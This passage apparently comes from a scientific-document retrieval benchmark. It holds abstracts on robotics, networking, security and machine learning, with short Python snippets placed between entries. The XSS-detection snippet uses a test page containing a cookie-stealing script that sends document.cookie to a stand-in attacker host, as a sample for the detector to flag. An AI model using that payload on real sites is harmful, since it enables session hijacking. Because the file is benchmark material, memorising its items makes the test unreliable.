"text": "Soft continuum manipulators have the advantage of being more compliant and having more degrees of freedom than rigid redundant manipulators. This attribute should allow soft manipulators to autonomously execute highly dexterous tasks. However, current approaches to motion planning, inverse kinematics, and even design limit the capacity of soft manipulators to take full advantage of their inherent compliance. We provide a computational approach to whole arm planning for a soft planar manipulator that advances the arm's end effector pose in task space while simultaneously considering the arm's entire envelope in proximity to a confined environment. The algorithm solves a series of constrained optimization problems to determine locally optimal inverse kinematics. Due to inherent limitations in modeling the kinematics of a highly compliant soft robot and the local optimality of the planner's solutions, we also rely on the increased softness of our newly designed manipulator to accomplish the whole arm task, namely the arm's ability to harmlessly collide with the environment. We detail the design and fabrication of the new modular manipulator as well as the planner's central algorithm. We experimentally validate our approach by showing that the robotic system is capable of autonomously advancing the soft arm through a pipe-like environment in order to reach distinct goal states.",
"title": ""
},
{
"docid": "5e7acc47170cbe30d330096b8aa87956",
"text": "For years we have known that cortical neurons collectively have synchronous or oscillatory patterns of activity, the frequencies and temporal dynamics of which are associated with distinct behavioural states. Although the function of these oscillations has remained obscure, recent experimental and theoretical results indicate that correlated fluctuations might be important for cortical processes, such as attention, that control the flow of information in the brain.",
"title": ""
},
{
"docid": "da18fa8e30c58f6b0039d8b1dc4b11a0",
"text": "Customer churn prediction is one of the key steps to maximize the value of customers for an enterprise. It is difficult to get satisfactory prediction effect by traditional models constructed on the assumption that the training and test data are subject to the same distribution, because the customers usually come from different districts and may be subject to different distributions in reality. This study proposes a feature-selection-based dynamic transfer ensemble (FSDTE) model that aims to introduce transfer learning theory for utilizing the customer data in both the target and related source domains. The model mainly conducts a two-layer feature selection. In the first layer, an initial feature subset is selected by GMDH-type neural network only in the target domain. In the second layer, several appropriate patterns from the source domain to target training set are selected, and some features with higher mutual information between them and the class variable are combined with the initial subset to construct a new feature subset. The selection in the second layer is repeated several times to generate a series of new feature subsets, and then, we train a base classifier in each one. Finally, a best base classifier is selected dynamically for each test pattern. The experimental results in two customer churn prediction datasets show that FSDTE can achieve better performance compared with the traditional churn prediction strategies, as well as three existing transfer learning strategies.",
"title": ""
},
{
"docid": "cdc3b46933db0c88f482ded1dcdff9e6",
"text": "Overvoltages in low voltage (LV) feeders with high penetration of photovoltaics (PV) are usually prevented by limiting the feeder's PV capacity to very conservative values, even if the critical periods rarely occur. This paper discusses the use of droop-based active power curtailment techniques for overvoltage prevention in radial LV feeders as a means for increasing the installed PV capacity and energy yield. Two schemes are proposed and tested in a typical 240-V/75-kVA Canadian suburban distribution feeder with 12 houses with roof-top PV systems. In the first scheme, all PV inverters have the same droop coefficients. In the second, the droop coefficients are different so as to share the total active power curtailed among all PV inverters/houses. Simulation results demonstrate the effectiveness of the proposed schemes and that the option of sharing the power curtailment among all customers comes at the cost of an overall higher amount of power curtailed.",
"title": ""
},
{
"docid": "639cccdcd0294c3c32714d0a6e01ef35",
"text": "The Center of Remote Sensing of Ice Sheets (CReSIS) is studying the use of the TETwalker mobile robot developed by NASA/Goddard Space Flight Center for polar seismic data acquisition. This paper discusses the design process for deploying seismic sensors within the 4-TETwalker mobile robot architecture. The 4-TETwalkerpsilas center payload node was chosen as the deployment medium. An alternative method of deploying seismic sensors that rest on the surface is included. Detailed models were also developed to study robot mobility dynamics and the deployment process. Finally, potential power options of solar sheaths and harvesting vibration energy are proposed.",
"title": ""
},
{
"docid": "5589615ee24bf5ba1ac5def2c5bc556e",
"text": "The computer industry is at a major inflection point in its hardware roadmap due to the end of a decades-long trend of exponentially increasing clock frequencies. Instead, future computer systems are expected to be built using homogeneous and heterogeneous many-core processors with 10’s to 100’s of cores per chip, and complex hardware designs to address the challenges of concurrency, energy efficiency and resiliency. Unlike previous generations of hardware evolution, this shift towards many-core computing will have a profound impact on software. These software challenges are further compounded by the need to enable parallelism in workloads and application domains that traditionally did not have to worry about multiprocessor parallelism in the past. A recent trend in mainstream desktop systems is the use of graphics processor units (GPUs) to obtain order-of-magnitude performance improvements relative to general-purpose CPUs. Unfortunately, hybrid programming models that support multithreaded execution on CPUs in parallel with CUDA execution on GPUs prove to be too complex for use by mainstream programmers and domain experts, especially when targeting platforms with multiple CPU cores and multiple GPU devices. In this paper, we extend past work on Intel’s Concurrent Collections (CnC) programming model to address the hybrid programming challenge using a model called CnC-CUDA. CnC is a declarative and implicitly parallel coordination language that supports flexible combinations of task and data parallelism while retaining determinism. CnC computations are built using steps that are related by data and control dependence edges, which are represented by a CnC graph. The CnC-CUDA extensions in this paper include the definition of multithreaded steps for execution on GPUs, and automatic generation of data and control flow between CPU steps and GPU steps. Experimental results show that this approach can yield significant performance benefits with both GPU execution and hybrid CPU/GPU execution.",
"title": ""
},
{
"docid": "b9f7c3cbf856ff9a64d7286c883e2640",
"text": "Graph database models can be defined as those in which data structures for the schema and instances are modeled as graphs or generalizations of them, and data manipulation is expressed by graph-oriented operations and type constructors. These models took off in the eighties and early nineties alongside object-oriented models. Their influence gradually died out with the emergence of other database models, in particular geographical, spatial, semistructured, and XML. Recently, the need to manage information with graph-like nature has reestablished the relevance of this area. The main objective of this survey is to present the work that has been conducted in the area of graph database modeling, concentrating on data structures, query languages, and integrity constraints.",
"title": ""
},
{
"docid": "deb04bcfb18a3350135c0b1ef155a11a",
"text": "Data privacy has been an important research topic in the security, theory and database communities in the last few decades. However, many existing studies have restrictive assumptions regarding the adversary's prior knowledge, meaning that they preserve individuals' privacy only when the adversary has rather limited background information about the sensitive data, or only uses certain kinds of attacks. Recently, differential privacy has emerged as a new paradigm for privacy protection with very conservative assumptions about the adversary's prior knowledge. Since its proposal, differential privacy had been gaining attention in many fields of computer science, and is considered among the most promising paradigms for privacy-preserving data publication and analysis. In this tutorial, we will motivate its introduction as a replacement for other paradigms, present the basics of the differential privacy model from a database perspective, describe the state of the art in differential privacy research, explain the limitations and shortcomings of differential privacy, and discuss open problems for future research.",
"title": ""
},
{
"docid": "82c9c8a7a9dccfa59b09df595de6235c",
"text": "Honeypots are closely monitored decoys that are employed in a network to study the trail of hackers and to alert network administrators of a possible intrusion. Using honeypots provides a cost-effective solution to increase the security posture of an organization. Even though it is not a panacea for security breaches, it is useful as a tool for network forensics and intrusion detection. Nowadays, they are also being extensively used by the research community to study issues in network security, such as Internet worms, spam control, DoS attacks, etc. In this paper, we advocate the use of honeypots as an effective educational tool to study issues in network security. We support this claim by demonstrating a set of projects that we have carried out in a network, which we have deployed specifically for running distributed computer security projects. The design of our projects tackles the challenges in installing a honeypot in academic institution, by not intruding on the campus network while providing secure access to the Internet. In addition to a classification of honeypots, we present a framework for designing assignments/projects for network security courses. The three sample honeypot projects discussed in this paper are presented as examples of the framework.",
"title": ""
},
{
"docid": "102077708fb1623c44c3b23d02387dd4",
"text": "Machine leaning apps require heavy computations, especially with the use of the deep neural network (DNN), so an embedded device with limited hardware cannot run the apps by itself. One solution for this problem is to offload DNN computations from the client to a nearby edge server. Existing approaches to DNN offloading with edge servers either specialize the edge server for fixed, specific apps, or customize the edge server for diverse apps, yet after migrating a large VM image that contains the client's back-end software system. In this paper, we propose a new and simple approach to offload DNN computations in the context of web apps. We migrate the current execution state of a web app from the client to the edge server just before executing a DNN computation, so that the edge server can execute the DNN computation with its powerful hardware. Then, we migrate the new execution state from the edge server to the client so that the client can continue to execute the app. We can save the execution state of the web app in the form of another web app called the snapshot, which immensely simplifies saving and restoring the execution state with a small overhead. We can offload any DNN app to any generic edge server, equipped with a browser and our offloading system. We address some issues related to offloading DNN apps such as how to send the DNN model and how to improve the privacy of user data. We also discuss how to install our offloading system on the edge server on demand. Our experiment with real DNN-based web apps shows that snapshot-based offloading achieves a promising performance result, comparable to running the app entirely on the server.",
"title": ""
},
{
"docid": "a4575294abe94aec3ae03451fc96f854",
"text": "Short-term traffic forecasting based on deep learning methods, especially long-term short memory (LSTM) neural networks, received much attention in recent years. However, the potential of deep learning methods is far from being fully exploited in terms of the depth of the architecture, the spatial scale of the prediction area, and the prediction power of spatial-temporal data. In this paper, a deep stacked bidirectional and unidirectional LSTM (SBU-LSTM) neural network is proposed, which considers both forward and backward dependencies of time series data, to predict the networkwide traffic speed. A bidirectional LSTM (BDLSM) layer is exploited to capture spatial features and bidirectional temporal dependencies from historical data. To the best of our knowledge, this is the first time that BDLSTM is applied as building blocks for a deep architecture model to measure the backward dependency of traffic data for prediction. A comparison with other classical and state-of-the-art models indicates that the proposed SBU-LSTM neural network achieves superior prediction performance for the whole traffic network in both accuracy and robustness.",
"title": ""
},
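The stacked bidirectional/unidirectional LSTM idea in the abstract above maps directly onto standard deep-learning building blocks. The following is a minimal sketch in Keras; the layer sizes, window length, and sensor count are illustrative assumptions rather than the authors' actual configuration.

```python
# Minimal sketch of a stacked bidirectional + unidirectional LSTM (SBU-LSTM-style)
# traffic-speed predictor. Layer sizes and depth are illustrative assumptions.
import numpy as np
from tensorflow.keras import layers, models

n_timesteps = 10      # length of the historical window
n_sensors = 323       # number of road segments / speed sensors (assumed)

model = models.Sequential([
    # Bidirectional layer captures forward and backward temporal dependencies.
    layers.Bidirectional(
        layers.LSTM(64, return_sequences=True),
        input_shape=(n_timesteps, n_sensors)),
    # Unidirectional layer summarizes the sequence.
    layers.LSTM(64),
    # One output per sensor: the predicted speed at the next time step.
    layers.Dense(n_sensors),
])
model.compile(optimizer="adam", loss="mse")

# Toy training data: X has shape (samples, timesteps, sensors), y is the next-step speed.
X = np.random.rand(256, n_timesteps, n_sensors).astype("float32")
y = np.random.rand(256, n_sensors).astype("float32")
model.fit(X, y, epochs=2, batch_size=32, verbose=0)
print(model.predict(X[:1]).shape)  # (1, n_sensors)
```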
{
"docid": "51cdea34f0bf97e6f901f560c607b89c",
"text": "Many state-of-the-art automatic speech recognition (ASR) systems adopt system combination techniques to improve recognition performance. In this paper, we investigate the possibility of transferring knowledge between models for different noisy speech domains and integrating these models via system combination. The first contribution of our work is the use of progressive neural networks for modeling the acoustic features of noisy speech. We train progressive neural networks on subdivided noisy data to achieve knowledge transfer between different noise conditions. Our second contribution is an improved multi-stream WFST framework that combines the output of the progressive networks at longer timescales (e.g., word hypotheses). The score fusion is performed by a trained LSTM at the word boundary on the decoding lattice. By adopting both knowledge transfer and system combination techniques, we achieve improved performance compared with independently trained deep neural networks.",
"title": ""
},
{
"docid": "230eeb3f19545befa245f7608378cb6d",
"text": "Most web programs are vulnerable to cross site scripting (XSS) that can be exploited by injecting JavaScript code. Unfortunately, injected JavaScript code is difficult to distinguish from the legitimate code at the client side. Given that, server side detection of injected JavaScript code can be a layer of defense. Existing server side approaches rely on identifying legitimate script code, and an attacker can circumvent the technique by injecting legitimate JavaScript code. Moreover, these approaches assume that no JavaScript code is downloaded from third party websites. To address these limitations, we develop a server side approach that distinguishes injected JavaScript code from legitimate JavaScript code. Our approach is based on the concept of injecting comment statements containing random tokens and features of legitimate JavaScript code. When a response page is generated, JavaScript code without or incorrect comment is considered as injected code. Moreover, the valid comments are checked for duplicity. Any presence of duplicate comments or a mismatch between expected code features and actually observed features represents JavaScript code as injected. We implement a prototype tool that automatically injects JavaScript comments and deploy injected JavaScript code detector as a server side filter. We evaluate our approach with three JSP programs. The evaluation results indicate that our approach detects a wide range of code injection attacks.",
"title": ""
}
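The comment-token idea described in the abstract above can be illustrated with a short server-side sketch. The token format, regular expressions, and filter logic below are assumptions for illustration only, not the paper's actual prototype.

```python
# Simplified sketch of the comment-token idea for spotting injected JavaScript:
# every legitimate inline script is stamped with a one-time random token comment,
# and the response filter flags scripts whose token is missing, unknown, or reused.
import re
import secrets

VALID_TOKENS = set()

def stamp_script(js_code: str) -> str:
    """Server-side templating step: prepend a random token comment to legitimate JS."""
    token = secrets.token_hex(16)
    VALID_TOKENS.add(token)
    return f"/* token:{token} */\n{js_code}"

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)
TOKEN_RE = re.compile(r"/\*\s*token:([0-9a-f]{32})\s*\*/")

def find_injected_scripts(html: str) -> list:
    """Return the script bodies that look injected in a generated response page."""
    injected, seen = [], set()
    for body in SCRIPT_RE.findall(html):
        m = TOKEN_RE.search(body)
        if not m or m.group(1) not in VALID_TOKENS or m.group(1) in seen:
            injected.append(body.strip())      # missing, unknown, or duplicated token
        else:
            seen.add(m.group(1))
    return injected

page = ("<script>" + stamp_script("renderPage();") + "</script>"
        "<script>document.location='http://evil.example/?c='+document.cookie</script>")
print(find_injected_scripts(page))  # only the attacker's script is reported
```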
] | scidocsrr |
b5fa56f1b9e0584dfaff0f990b9842c5 | A fast face clustering method for indexing applications on mobile phones | [
{
"docid": "5cf71fc03658cd7210ac2a764f1425d7",
"text": "Most existing pose robust methods are too computational complex to meet practical applications and their performance under unconstrained environments are rarely evaluated. In this paper, we propose a novel method for pose robust face recognition towards practical applications, which is fast, pose robust and can work well under unconstrained environments. Firstly, a 3D deformable model is built and a fast 3D model fitting algorithm is proposed to estimate the pose of face image. Secondly, a group of Gabor filters are transformed according to the pose and shape of face image for feature extraction. Finally, PCA is applied on the pose adaptive Gabor features to remove the redundances and Cosine metric is used to evaluate the similarity. The proposed method has three advantages: (1) The pose correction is applied in the filter space rather than image space, which makes our method less affected by the precision of the 3D model, (2) By combining the holistic pose transformation and local Gabor filtering, the final feature is robust to pose and other negative factors in face recognition, (3) The 3D structure and facial symmetry are successfully used to deal with self-occlusion. Extensive experiments on FERET and PIE show the proposed method outperforms state-of-the-art methods significantly, meanwhile, the method works well on LFW.",
"title": ""
}
] | [
{
"docid": "b89f17fc46b9515b6fd6e7223335bedd",
"text": "Systems for automati ally re ommending items (e.g., movies, produ ts, or information) to users are be oming in reasingly important in eommer e appli ations, digital libraries, and other domains where mass personalization is highly valued. Su h re ommender systems typi ally base their suggestions on (1) ollaborative data en oding whi h users like whi h items, and/or (2) ontent data des ribing item features and user demographi s. Systems that rely solely on ollaborative data fail when operating from a old start|that is, when re ommending items (e.g., rst-run movies) that no member of the ommunity has yet seen. We develop several generative probabilisti models that ir umvent the old-start problem by mixing ontent data with ollaborative data in a sound statisti al manner. We evaluate the algorithms using MovieLens movie ratings data, augmented with a tor and dire tor information from the Internet Movie Database. We nd that maximum likelihood learning with the expe tation maximization (EM) algorithm and variants tends to over t omplex models that are initialized randomly. However, by seeding parameters of the omplex models with parameters learned in simpler models, we obtain greatly improved performan e. We explore both methods that exploit a single type of ontent data (e.g., a tors only) and methods that leverage multiple types of ontent data (e.g., both a tors and dire tors) simultaneously.",
"title": ""
},
{
"docid": "42154a643aea1be4c0f531306a98bcee",
"text": "With Grand Theft Education: Literacy in the Age of Video Games gracing the cover of Harper’s September 2006 magazine, video games and education, once the quirky interest of a few rogue educational technologists and literacy scholars, reached broader public awareness. The idea of combining video games and education is not new; twenty years ago, Ronald Reagan praised video games for their potential to train “a new generation of warriors.” Meanwhile, Surgeon General C. Everett Koop declared video games among the top health risks facing Americans.1 Video games, like any emerging medium, are disruptive, challenging existing social practices, while capturing our dreams and triggering our fears. Today’s gaming technologies, which allow for unprecedented player exploration and expression, suggest new models of what educational gaming can be.2 As educational games leave the realm of abstraction and become a reality, the field needs to move beyond rhetoric and toward grounded examples not just of good educational games, but effective game-based learning environments that leverage the critical aspects of the medium as they apply to the needs of a twenty-first-century educational system. We need rigorous research into what players do with games (particularly those that don’t claim explicit status as educational), and a better understanding of the thinking that is involved in playing them.3 We need precise language for what we mean by “video games,” and better understandings of how specific design features and patterns operate,4 and compelling evidence of game-based learning environments. In short, the study of games and learning is ready to come of age. Researchers have convinced the academy that games are worthy of study, and that games hold potential for learning. The task now is to provide effective models of how they operate.5 This chapter offers a theoretical model for video game-based learning environments as designed experiences. To be more specific, it suggests that we can take one particular type of video game—open-ended simulation, or “sandbox” games—and use its capacity to recruit diverse interests, creative problem solving, and productive acts (e.g., creating artwork, game",
"title": ""
},
{
"docid": "483e6da76a41038b3d1a6e97fb02fea4",
"text": "Unhealthy use of the Internet and mobile phones is a health issue in Japan. We solicited participation in this questionnaire-based study from the employees of a city office in Kumamoto. A total of 92 men and 54 women filled in the Internet Addiction Questionnaire (IAQ), the Self-perception of Text-message Dependency Scale (STDS), and the Hospital Anxiety and Depression Scale (HADS). The prevalence of ‘‘light Internet addiction’’ and ‘‘severe Internet addiction’’ were 33.7% and 6.1% for men whereas they were 24.6% and 1.8% for women. The prevalence of ‘‘light mobile phone text-message addiction’’ was 3.1% for men and 5.4% for women. There were no cases of ‘‘sever text-message addiction’’. We found a two-factor structure for the IAQ and a three-factor structure for the STDS. We also performed an EFA of the IAQ and STDS subscales, and this revealed a two-factor structure – Internet Dependency and Text-message Dependency. An STDS subscale, Relationship Maintenance, showed a moderate factor loading of the factor that reflected unhealthy Internet use. In a path analysis, Depression was associated with both Internet Dependency and Text-message Dependency whereas Anxiety was associated negatively with Text-message Dependency. These results suggest applicability of the IAQ and STDS and that Internet and Text-message Dependences are factorially distinct. 2011 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "28d75588fdb4ff45929da124b001e8cc",
"text": "We present a novel training framework for neural sequence models, particularly for grounded dialog generation. The standard training paradigm for these models is maximum likelihood estimation (MLE), or minimizing the cross-entropy of the human responses. Across a variety of domains, a recurring problem with MLE trained generative neural dialog models (G) is that they tend to produce ‘safe’ and generic responses (‘I don’t know’, ‘I can’t tell’). In contrast, discriminative dialog models (D) that are trained to rank a list of candidate human responses outperform their generative counterparts; in terms of automatic metrics, diversity, and informativeness of the responses. However, D is not useful in practice since it can not be deployed to have real conversations with users. Our work aims to achieve the best of both worlds – the practical usefulness of G and the strong performance of D – via knowledge transfer from D to G. Our primary contribution is an end-to-end trainable generative visual dialog model, where G receives gradients from D as a perceptual (not adversarial) loss of the sequence sampled from G. We leverage the recently proposed Gumbel-Softmax (GS) approximation to the discrete distribution – specifically, a RNN augmented with a sequence of GS samplers, coupled with the straight-through gradient estimator to enable end-to-end differentiability. We also introduce a stronger encoder for visual dialog, and employ a self-attention mechanism for answer encoding along with a metric learning loss to aid D in better capturing semantic similarities in answer responses. Overall, our proposed model outperforms state-of-the-art on the VisDial dataset by a significant margin (2.67% on recall@10). The source code can be downloaded from https://github.com/jiasenlu/visDial.pytorch",
"title": ""
},
{
"docid": "26d9a51b9312af2b63d2e2876c9d448e",
"text": "Permission has been given to destroy this document when it is no longer needed. Cyber-enabled and cyber-physical systems connect and engage virtually every mission-critical military capability today. And as more warfighting technologies become integrated and connected, both the risks and opportunities from a cyberwarfare continue to grow—motivating sweeping requirements and investments in cybersecurity assessment capabilities to evaluate technology vulner-abilities, operational impacts, and operator effectiveness. Operational testing of cyber capabilities, often in conjunction with major military exercises, provides valuable connections to and feedback from the operational warfighter community. These connections can help validate capability impact on the mission and, when necessary, provide course-correcting feedback to the technology development process and its stakeholders. However, these tests are often constrained in scope, duration, and resources and require a thorough and wholistic approach, especially with respect to cyber technology assessments, where additional safety and security constraints are often levied. This report presents a summary of the state of the art in cyber assessment technologies and methodologies and prescribes an approach to the employment of cyber range operational exercises (OPEXs). Numerous recommendations on general cyber assessment methodologies and cyber range design are included, the most significant of which are summarized below. • Perform bottom-up and top-down assessment formulation methodologies to robustly link mission and assessment objectives to metrics, success criteria, and system observables. • Include threat-based assessment formulation methodologies that define risk and security met-rics within the context of mission-relevant adversarial threats and mission-critical system assets. • Follow a set of cyber range design mantras to guide and grade the design of cyber range components. • Call for future work in live-to-virtual exercise integration and cross-domain modeling and simulation technologies. • Call for continued integration of developmental and operational cyber assessment events, development of reusable cyber assessment test tools and processes, and integration of a threat-based assessment approach across the cyber technology acquisition cycle. Finally, this recommendations report was driven by obsevations made by the MIT Lincoln Laboratory (MIT LL) Cyber Measurement Campaign (CMC) team during an operational demonstration event for the DoD Enterprise Cyber Range Environment (DECRE) Command and Control Information Systems (C2IS). 1 This report also incorporates a prior CMC report based on Pacific Command (PACOM) exercise observations, as well as MIT LL's expertise in cyber range development and cyber systems assessment. 2 1 CMC is explained in further detail in Appendix A.1. 2 See References section at the end of the report. …",
"title": ""
},
{
"docid": "392c2499a8d9c0ec2bf329ab92d6ace3",
"text": "OBJECTIVE\nCurrent state-of-the-art artificial pancreas systems are either based on traditional linear control theory or rely on mathematical models of glucose-insulin dynamics. Blood glucose control using these methods is limited due to the complexity of the biological system. The aim of this study was to describe the principles and clinical performance of the novel MD-Logic Artificial Pancreas (MDLAP) System.\n\n\nRESEARCH DESIGN AND METHODS\nThe MDLAP applies fuzzy logic theory to imitate lines of reasoning of diabetes caregivers. It uses a combination of control-to-range and control-to-target strategies to automatically regulate individual glucose levels. Feasibility clinical studies were conducted in seven adults with type 1 diabetes (aged 19-30 years, mean diabetes duration 10 +/- 4 years, mean A1C 6.6 +/- 0.7%). All underwent 14 full, closed-loop control sessions of 8 h (fasting and meal challenge conditions) and 24 h.\n\n\nRESULTS\nThe mean peak postprandial (overall sessions) glucose level was 224 +/- 22 mg/dl. Postprandial glucose levels returned to <180 mg/dl within 2.6 +/- 0.6 h and remained stable in the normal range for at least 1 h. During 24-h closed-loop control, 73% of the sensor values ranged between 70 and 180 mg/dl, 27% were >180 mg/dl, and none were <70 mg/dl. There were no events of symptomatic hypoglycemia during any of the trials.\n\n\nCONCLUSIONS\nThe MDLAP system is a promising tool for individualized glucose control in patients with type 1 diabetes. It is designed to minimize high glucose peaks while preventing hypoglycemia. Further studies are planned in the broad population under daily-life conditions.",
"title": ""
},
{
"docid": "cc3eac062ecd9953796b43425ede0663",
"text": "The ElGamal encryption scheme has been proposed several years ago and is one of the few probabilistic encryption schemes. However, its security has never been concretely proven based on clearly understood and accepted primitives. Here we show directly that the decision Diffie-Hellman assumption implies the security of the original ElGamal encryption scheme (with messages from a subgroup) without modification. In addition, we show that the opposite direction holds, i.e., the semantic security of the ElGamal encryption is actually equivalent to the decision Diffie-Hellman problem. We also present an exact analysis of the efficiency of the reduction. Next we present additions on ElGamal encryption which result in nonmalleability under adaptive chosen plaintext attacks. Non-malleability is equivalent to the decision Diffie-Hellman assumption, the existence of a random oracle (in practice a secure hash function) or a trusted beacon (as needed for the Fiat-Shamir argument), and one assumption about the unforgeability of Schnorr signatures. Our proof employs the tool of message awareness.",
"title": ""
},
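For readers less familiar with the scheme under discussion, the following is a didactic sketch of textbook ElGamal over a prime-order subgroup. The toy parameters are far too small to be secure and message encoding into the subgroup is assumed; the sketch only shows key generation, encryption, and decryption.

```python
# Didactic sketch of ElGamal encryption in a prime-order subgroup (toy parameters,
# NOT secure sizes). Messages are assumed to be encoded as subgroup elements.
import secrets

p = 467                      # small safe prime: p = 2q + 1
q = (p - 1) // 2             # prime order of the subgroup
g = 4                        # generator of the order-q subgroup (4 = 2^2 mod p)

def keygen():
    x = secrets.randbelow(q - 1) + 1          # private key
    return x, pow(g, x, p)                    # (private x, public h = g^x)

def encrypt(h, m):
    """m must be an element of the order-q subgroup."""
    k = secrets.randbelow(q - 1) + 1
    return pow(g, k, p), (m * pow(h, k, p)) % p   # ciphertext (c1, c2)

def decrypt(x, c1, c2):
    s = pow(c1, x, p)                         # shared secret c1^x
    return (c2 * pow(s, p - 2, p)) % p        # c2 * s^{-1} mod p (Fermat inverse)

x, h = keygen()
m = pow(g, 123, p)                            # encode the message as a subgroup element
c1, c2 = encrypt(h, m)
assert decrypt(x, c1, c2) == m
print("recovered:", decrypt(x, c1, c2))
```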
{
"docid": "aec38c33e2dce7165b7d148982082509",
"text": "Predicting the success or failure of a student in a course or program is a problem that has recently been addressed using data mining techniques. In this paper we evaluate some of the most popular classification and regression algorithms on this problem. We address two problems: prediction of approval/failure and prediction of grade. The former is tackled as a classification task while the latter as a regression task. Separate models are trained for each course. The experiments were carried out using administrate data from the University of Porto, concerning approximately 700 courses. The algorithms with best results overall in classification were decision trees and SVM while in regression they were SVM, Random Forest, and AdaBoost.R2. However, in the classification setting, the algorithms are finding useful patterns, while, in regression, the models obtained are not able to beat a simple baseline.",
"title": ""
},
{
"docid": "7c5f2c92cb3d239674f105a618de99e0",
"text": "We consider the isolated spelling error correction problem as a specific subproblem of the more general string-to-string translation problem. In this context, we investigate four general string-to-string transformation models that have been suggested in recent years and apply them within the spelling error correction paradigm. In particular, we investigate how a simple ‘k-best decoding plus dictionary lookup’ strategy performs in this context and find that such an approach can significantly outdo baselines such as edit distance, weighted edit distance, and the noisy channel Brill and Moore model to spelling error correction. We also consider elementary combination techniques for our models such as language model weighted majority voting and center string combination. Finally, we consider real-world OCR post-correction for a dataset sampled from medieval Latin texts.",
"title": ""
},
{
"docid": "1a59bf4467e73a6cae050e5670dbf4fa",
"text": "BACKGROUND\nNivolumab combined with ipilimumab resulted in longer progression-free survival and a higher objective response rate than ipilimumab alone in a phase 3 trial involving patients with advanced melanoma. We now report 3-year overall survival outcomes in this trial.\n\n\nMETHODS\nWe randomly assigned, in a 1:1:1 ratio, patients with previously untreated advanced melanoma to receive nivolumab at a dose of 1 mg per kilogram of body weight plus ipilimumab at a dose of 3 mg per kilogram every 3 weeks for four doses, followed by nivolumab at a dose of 3 mg per kilogram every 2 weeks; nivolumab at a dose of 3 mg per kilogram every 2 weeks plus placebo; or ipilimumab at a dose of 3 mg per kilogram every 3 weeks for four doses plus placebo, until progression, the occurrence of unacceptable toxic effects, or withdrawal of consent. Randomization was stratified according to programmed death ligand 1 (PD-L1) status, BRAF mutation status, and metastasis stage. The two primary end points were progression-free survival and overall survival in the nivolumab-plus-ipilimumab group and in the nivolumab group versus the ipilimumab group.\n\n\nRESULTS\nAt a minimum follow-up of 36 months, the median overall survival had not been reached in the nivolumab-plus-ipilimumab group and was 37.6 months in the nivolumab group, as compared with 19.9 months in the ipilimumab group (hazard ratio for death with nivolumab plus ipilimumab vs. ipilimumab, 0.55 [P<0.001]; hazard ratio for death with nivolumab vs. ipilimumab, 0.65 [P<0.001]). The overall survival rate at 3 years was 58% in the nivolumab-plus-ipilimumab group and 52% in the nivolumab group, as compared with 34% in the ipilimumab group. The safety profile was unchanged from the initial report. Treatment-related adverse events of grade 3 or 4 occurred in 59% of the patients in the nivolumab-plus-ipilimumab group, in 21% of those in the nivolumab group, and in 28% of those in the ipilimumab group.\n\n\nCONCLUSIONS\nAmong patients with advanced melanoma, significantly longer overall survival occurred with combination therapy with nivolumab plus ipilimumab or with nivolumab alone than with ipilimumab alone. (Funded by Bristol-Myers Squibb and others; CheckMate 067 ClinicalTrials.gov number, NCT01844505 .).",
"title": ""
},
{
"docid": "3141caaf2d19070e46e66b7a219c131e",
"text": "The sudden inability to walk is one of the most glaring impairments following spinal cord injury (SCI). Regardless of time since injury, recovery of walking has been found to be one of the top priorities for those with SCI as well as their rehabilitation professionals [1]. Despite clinical management and promising basic science research advances, a recent multicenter prospective study revealed that 59% of those with SCI are unable to ambulate without assistance from others at one year following injury [2]. The worldwide incidence of SCI is between 10.4-83 per million [3], and there are approximately 265,000 persons with SCI living in the United States [4]. Thus, there is a tremendous consumer demand to improve ambulation outcomes following SCI.",
"title": ""
},
{
"docid": "52b9fdd4601e8a084346721bea3b824e",
"text": "Detecting road potholes and road roughness levels is key to road condition monitoring, which impacts transport safety and driving comfort. We propose a crowd sourcing based road surface monitoring system, simply called CRSM. CRSM can effectively detect road potholes and evaluate road roughness levels using our hardware modules mounted on distributed vehicles. These modules use low-end accelerometers and GPS devices to obtain vibration pattern, location, and vehicle velocity. Considering the high cost of onboard storage and wireless transmission, a novel light-weight data mining algorithm is proposed to detect road surface events and transmit potential pothole information to a central server. The server gathers reports from the multiple vehicles, and makes a comprehensive evaluation on road surface quality. We have implemented a product-quality system and deployed it on 100 taxies in the Shenzhen urban area. The results show that CRSM can detect road potholes with up to 90% accuracy, and nearly zero false alarms. CRSM can also evaluate road roughness levels correctly, even with some interferences from small bumps or potholes.",
"title": ""
},
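The abstract above does not spell out the light-weight mining algorithm, so the sketch below only illustrates the kind of vertical-acceleration thresholding that crowd-sourced road monitoring systems build on. The threshold, minimum speed, and refractory period are assumed values, not CRSM's actual parameters.

```python
# Minimal sketch of accelerometer-based pothole flagging. The rule and constants
# are illustrative assumptions, not CRSM's actual light-weight mining algorithm.
from dataclasses import dataclass
from typing import List

@dataclass
class Sample:
    t: float        # timestamp (s)
    z: float        # vertical acceleration (m/s^2), gravity removed
    lat: float
    lon: float
    speed: float    # vehicle speed (m/s)

def detect_potholes(samples: List[Sample],
                    z_thresh: float = 4.0,
                    min_speed: float = 5.0,
                    refractory: float = 1.0) -> List[Sample]:
    """Flag samples whose vertical-acceleration spike exceeds z_thresh while the
    vehicle is moving; a refractory period avoids reporting one bump many times."""
    events, last_t = [], -1e9
    for s in samples:
        if s.speed >= min_speed and abs(s.z) >= z_thresh and s.t - last_t >= refractory:
            events.append(s)
            last_t = s.t
    return events

trace = [Sample(0.0, 0.3, 22.54, 114.05, 8.0),
         Sample(0.5, 5.2, 22.54, 114.06, 8.1),   # sharp spike -> candidate pothole
         Sample(0.6, 4.8, 22.54, 114.06, 8.1),   # suppressed by refractory period
         Sample(3.0, 0.2, 22.55, 114.07, 8.3)]
print([(e.t, e.lat, e.lon) for e in detect_potholes(trace)])
```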
{
"docid": "0e5a7bc9022e47a6616a018fd7637832",
